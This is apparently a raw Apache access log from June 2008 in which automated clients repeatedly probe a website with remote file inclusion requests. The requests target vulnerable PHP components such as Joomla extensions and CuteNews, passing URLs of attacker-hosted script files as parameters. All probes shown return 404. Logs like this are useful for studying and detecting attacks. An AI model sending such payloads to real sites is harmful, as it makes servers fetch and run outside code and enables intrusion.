209.51.219.170 - - [11/Jun/2008:09:14:39 -0700] "GET /errors.php?error=http://www.auctionzone.com.au/templates/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.51.219.170 - - [11/Jun/2008:09:14:39 -0700] "GET /logs/errors.php?error=http://www.auctionzone.com.au/templates/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.246.155.194 - - [11/Jun/2008:09:14:48 -0700] "GET /logs/access_080216.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://evro-set.ru/modules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.246.155.194 - - [11/Jun/2008:09:14:52 -0700] "GET /logs/access_080216.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://evro-set.ru/modules/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.13.224.83 - - [11/Jun/2008:09:14:52 -0700] "GET /logs/access_080313.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.51.219.170 - - [11/Jun/2008:09:15:01 -0700] "GET /logs/access_080223.log/errors.php?error=http://www.auctionzone.com.au/templates/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.51.219.170 - - [11/Jun/2008:09:15:01 -0700] "GET /errors.php?error=http://www.auctionzone.com.au/templates/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.51.219.170 - - [11/Jun/2008:09:15:02 -0700] "GET /logs/errors.php?error=http://www.auctionzone.com.au/templates/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.76.111.11 - - [11/Jun/2008:09:15:26 -0700] "GET /logs/access_080313.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.76.111.11 - - [11/Jun/2008:09:15:27 -0700] "GET /logs/access_080313.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
77.87.191.61 - - [11/Jun/2008:09:15:32 -0700] "GET /logs/access_080331.log/cutenews//show_archives.php?cutepath=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
77.87.191.61 - - [11/Jun/2008:09:15:32 -0700] "GET /cutenews//show_archives.php?cutepath=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
77.87.191.61 - - [11/Jun/2008:09:15:32 -0700] "GET /logs/access_080330.log/cutenews//show_archives.php?cutepath=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
77.87.191.61 - - [11/Jun/2008:09:15:33 -0700] "GET /logs/cutenews//show_archives.php?cutepath=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
195.242.99.93 - - [11/Jun/2008:09:15:41 -0700] "GET /logs/access_080215.log//mcf.php?content=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.242.99.93 - - [11/Jun/2008:09:15:42 -0700] "GET /logs/access_080215.log/errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.242.99.93 - - [11/Jun/2008:09:15:42 -0700] "GET //mcf.php?content=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.242.99.93 - - [11/Jun/2008:09:15:42 -0700] "GET /errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.242.99.93 - - [11/Jun/2008:09:15:43 -0700] "GET /logs//mcf.php?content=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.242.99.93 - - [11/Jun/2008:09:15:43 -0700] "GET /logs/errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
70.88.226.121 - - [11/Jun/2008:09:15:44 -0700] "GET /logs/access_080313.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.87.191.61 - - [11/Jun/2008:09:15:46 -0700] "GET /logs/access_080330.log/cutenews//show_archives.php?cutepath=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
77.87.191.61 - - [11/Jun/2008:09:15:49 -0700] "GET /logs/access_080331.log/cutenews//show_archives.php?cutepath=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
77.87.191.61 - - [11/Jun/2008:09:15:50 -0700] "GET /cutenews//show_archives.php?cutepath=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
77.87.191.61 - - [11/Jun/2008:09:15:50 -0700] "GET /logs/cutenews//show_archives.php?cutepath=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.98.244.6 - - [11/Jun/2008:09:15:57 -0700] "GET /logs/access_080313.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.87.191.61 - - [11/Jun/2008:09:16:04 -0700] "GET /logs/access_080330.log/cutenews//show_archives.php?cutepath=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.110.101.219 - - [11/Jun/2008:09:16:11 -0700] "GET /logs/access_080223.log/errors.php?error=http://raversijde.callemin.be/fotoalbum/albums/zomerfeest2004/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
212.110.101.219 - - [11/Jun/2008:09:16:12 -0700] "GET /errors.php?error=http://raversijde.callemin.be/fotoalbum/albums/zomerfeest2004/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
212.110.101.219 - - [11/Jun/2008:09:16:12 -0700] "GET /logs/errors.php?error=http://raversijde.callemin.be/fotoalbum/albums/zomerfeest2004/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
200.30.73.117 - - [11/Jun/2008:09:16:12 -0700] "GET /logs/access_080101.log//administrator/components/com_joomla-visites/core/include/ViewModule.class.php?mosConfig_absolute_path=http://myowncommunity.com/smfarchons/attachments/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.110.101.219 - - [11/Jun/2008:09:16:13 -0700] "GET /logs/access.log/errors.php?error=http://raversijde.callemin.be/fotoalbum/albums/zomerfeest2004/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
212.110.101.219 - - [11/Jun/2008:09:16:14 -0700] "GET /errors.php?error=http://raversijde.callemin.be/fotoalbum/albums/zomerfeest2004/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
212.110.101.219 - - [11/Jun/2008:09:16:14 -0700] "GET /logs/errors.php?error=http://raversijde.callemin.be/fotoalbum/albums/zomerfeest2004/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
209.51.219.170 - - [11/Jun/2008:09:16:30 -0700] "GET /logs/access_080118.log/errors.php?error=http://www.auctionzone.com.au/templates/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.51.219.170 - - [11/Jun/2008:09:16:31 -0700] "GET /errors.php?error=http://www.auctionzone.com.au/templates/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.51.219.170 - - [11/Jun/2008:09:16:31 -0700] "GET /logs/errors.php?error=http://www.auctionzone.com.au/templates/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.51.219.170 - - [11/Jun/2008:09:16:57 -0700] "GET /logs/access_080123.log/errors.php?error=http://www.auctionzone.com.au/templates/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.110.101.219 - - [11/Jun/2008:09:16:59 -0700] "GET /logs/access_080118.log/errors.php?error=http://raversijde.callemin.be/fotoalbum/albums/zomerfeest2004/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
212.110.101.219 - - [11/Jun/2008:09:17:00 -0700] "GET /errors.php?error=http://raversijde.callemin.be/fotoalbum/albums/zomerfeest2004/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
212.110.101.219 - - [11/Jun/2008:09:17:00 -0700] "GET /logs/errors.php?error=http://raversijde.callemin.be/fotoalbum/albums/zomerfeest2004/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
212.110.101.219 - - [11/Jun/2008:09:17:01 -0700] "GET /logs/access_080123.log/errors.php?error=http://raversijde.callemin.be/fotoalbum/albums/zomerfeest2004/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
211.210.38.24 - - [11/Jun/2008:09:17:06 -0700] "GET /logs/access_080312.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.freewebtown.com/caspyan/arma?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.127.166 - - [11/Jun/2008:09:17:24 -0700] "GET /logs/menu.php?page=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.127.166 - - [11/Jun/2008:09:17:24 -0700] "GET /menu.php?page=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.110.101.219 - - [11/Jun/2008:09:17:29 -0700] "GET /logs/access_080312.log/errors.php?error=http://raversijde.callemin.be/fotoalbum/albums/zomerfeest2004/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
209.51.219.170 - - [11/Jun/2008:09:17:48 -0700] "GET /logs/access_080225.log/errors.php?error=http://www.auctionzone.com.au/templates/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.158.23 - - [11/Jun/2008:09:17:54 -0700] "GET /logs/access_080106.log/modules/My_eGallery/index.php?basepath=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.135.183.134 - - [11/Jun/2008:09:17:58 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.0" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
195.135.183.134 - - [11/Jun/2008:09:17:59 -0700] "GET /errors.php?error=http://1285-2.1st-housing.de/skins/sys_cr4nk/i? HTTP/1.0" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
212.9.93.30 - - [11/Jun/2008:09:18:14 -0700] "GET /logs/access_080221.log//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.9.93.30 - - [11/Jun/2008:09:18:15 -0700] "GET //components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.9.93.30 - - [11/Jun/2008:09:18:15 -0700] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://www.iglesialcs.cl/newweb/cache/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.72.215.178 - - [11/Jun/2008:09:19:06 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.72.215.178 - - [11/Jun/2008:09:19:06 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:09:19:07 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:09:19:07 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:09:19:07 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.72.215.178 - - [11/Jun/2008:09:19:11 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.51.219.170 - - [11/Jun/2008:09:19:12 -0700] "GET /logs/access_080118.log/errors.php?error=http://www.auctionzone.com.au/templates/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.51.219.170 - - [11/Jun/2008:09:19:13 -0700] "GET /errors.php?error=http://www.auctionzone.com.au/templates/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.51.219.170 - - [11/Jun/2008:09:19:13 -0700] "GET /logs/errors.php?error=http://www.auctionzone.com.au/templates/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.51.219.170 - - [11/Jun/2008:09:19:16 -0700] "GET /logs/access_080215.log/errors.php?error=http://www.auctionzone.com.au/templates/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.51.219.170 - - [11/Jun/2008:09:19:17 -0700] "GET /errors.php?error=http://www.auctionzone.com.au/templates/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.51.219.170 - - [11/Jun/2008:09:19:17 -0700] "GET /logs/errors.php?error=http://www.auctionzone.com.au/templates/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.72.112.91 - - [11/Jun/2008:09:19:21 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.72.112.91 - - [11/Jun/2008:09:19:21 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.72.112.91 - - [11/Jun/2008:09:19:21 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:09:19:24 -0700] "GET /logs/access_080123.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.51.219.170 - - [11/Jun/2008:09:19:25 -0700] "GET /logs/access_080123.log/errors.php?error=http://www.auctionzone.com.au/templates/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
79.114.70.239 - - [11/Jun/2008:09:19:26 -0700] "GET /logs/access_080108.log HTTP/1.1" 200 413211 "-" "rkonxvxsxhnjswxtayictsykiqr mqtvxtcgdG" "www.dmulk.com"
69.72.215.178 - - [11/Jun/2008:09:19:26 -0700] "GET /logs/access_080123.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.51.219.170 - - [11/Jun/2008:09:19:30 -0700] "GET /logs/access.log/errors.php?error=http://www.auctionzone.com.au/templates/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.51.219.170 - - [11/Jun/2008:09:19:30 -0700] "GET /errors.php?error=http://www.auctionzone.com.au/templates/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.51.219.170 - - [11/Jun/2008:09:19:30 -0700] "GET /logs/errors.php?error=http://www.auctionzone.com.au/templates/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.72.112.91 - - [11/Jun/2008:09:19:38 -0700] "GET /logs/access_080123.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.66.182 - - [11/Jun/2008:09:19:59 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.30.73.117 - - [11/Jun/2008:09:20:00 -0700] "GET /logs/access_080101.log//administrator/components/com_joomla-visites/core/include/ViewModule.class.php?mosConfig_absolute_path=http://myowncommunity.com/smfarchons/attachments/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.66.182 - - [11/Jun/2008:09:20:00 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.182 - - [11/Jun/2008:09:20:00 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.64.200 - - [11/Jun/2008:09:20:05 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.64.200 - - [11/Jun/2008:09:20:05 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.64.200 - - [11/Jun/2008:09:20:06 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.182 - - [11/Jun/2008:09:20:28 -0700] "GET /logs/access_080123.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.64.200 - - [11/Jun/2008:09:20:30 -0700] "GET /logs/access_080123.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.197.98 - - [11/Jun/2008:09:20:35 -0700] "GET /logs//errors.php?error=http://busway.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
67.19.197.98 - - [11/Jun/2008:09:20:35 -0700] "GET //errors.php?error=http://busway.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
212.110.101.219 - - [11/Jun/2008:09:20:48 -0700] "GET /logs/access.log/errors.php?error=http://raversijde.callemin.be/fotoalbum/albums/zomerfeest2004/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
212.110.101.219 - - [11/Jun/2008:09:20:48 -0700] "GET /errors.php?error=http://raversijde.callemin.be/fotoalbum/albums/zomerfeest2004/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
212.110.101.219 - - [11/Jun/2008:09:20:49 -0700] "GET /logs/errors.php?error=http://raversijde.callemin.be/fotoalbum/albums/zomerfeest2004/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:09:21:12 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.110.101.219 - - [11/Jun/2008:09:21:16 -0700] "GET /logs/access_080120.log/errors.php?error=http://raversijde.callemin.be/fotoalbum/albums/zomerfeest2004/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
212.110.101.219 - - [11/Jun/2008:09:21:17 -0700] "GET /errors.php?error=http://raversijde.callemin.be/fotoalbum/albums/zomerfeest2004/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
212.110.101.219 - - [11/Jun/2008:09:21:18 -0700] "GET /logs/errors.php?error=http://raversijde.callemin.be/fotoalbum/albums/zomerfeest2004/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
209.51.219.170 - - [11/Jun/2008:09:21:19 -0700] "GET /logs/access_080211.log/errors.php?error=http://www.auctionzone.com.au/templates/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.51.219.170 - - [11/Jun/2008:09:21:20 -0700] "GET /errors.php?error=http://www.auctionzone.com.au/templates/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.51.219.170 - - [11/Jun/2008:09:21:20 -0700] "GET /logs/errors.php?error=http://www.auctionzone.com.au/templates/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.72.215.178 - - [11/Jun/2008:09:21:36 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
190.34.160.226 - - [11/Jun/2008:09:21:58 -0700] "GET /logs/sub.php?menu=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.34.160.226 - - [11/Jun/2008:09:21:58 -0700] "GET /sub.php?menu=ftp://193.253.223.43/tmp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.151.80.21 - - [11/Jun/2008:09:22:04 -0700] "GET /logs/access_080312.log//faqsupport/samplefaqsupport.php?path[docroot]=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.151.80.21 - - [11/Jun/2008:09:22:05 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.151.80.21 - - [11/Jun/2008:09:22:05 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.110.101.219 - - [11/Jun/2008:09:22:11 -0700] "GET /logs/access_080118.log/errors.php?error=http://raversijde.callemin.be/fotoalbum/albums/zomerfeest2004/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
89.108.64.200 - - [11/Jun/2008:09:22:11 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.151.80.21 - - [11/Jun/2008:09:22:13 -0700] "GET /logs/access_080312.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.151.80.21 - - [11/Jun/2008:09:22:13 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.151.80.21 - - [11/Jun/2008:09:22:14 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://blog.me.lit.edu.tw/adu/special.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.51.219.170 - - [11/Jun/2008:09:22:14 -0700] "GET /logs/access_080215.log/errors.php?error=http://www.auctionzone.com.au/templates/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.51.219.170 - - [11/Jun/2008:09:22:14 -0700] "GET /errors.php?error=http://www.auctionzone.com.au/templates/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.51.219.170 - - [11/Jun/2008:09:22:14 -0700] "GET /logs/errors.php?error=http://www.auctionzone.com.au/templates/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.221.143.111 - - [11/Jun/2008:09:22:20 -0700] "GET ///includes/kb_constants.php?module_root_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.108.66.182 - - [11/Jun/2008:09:22:26 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
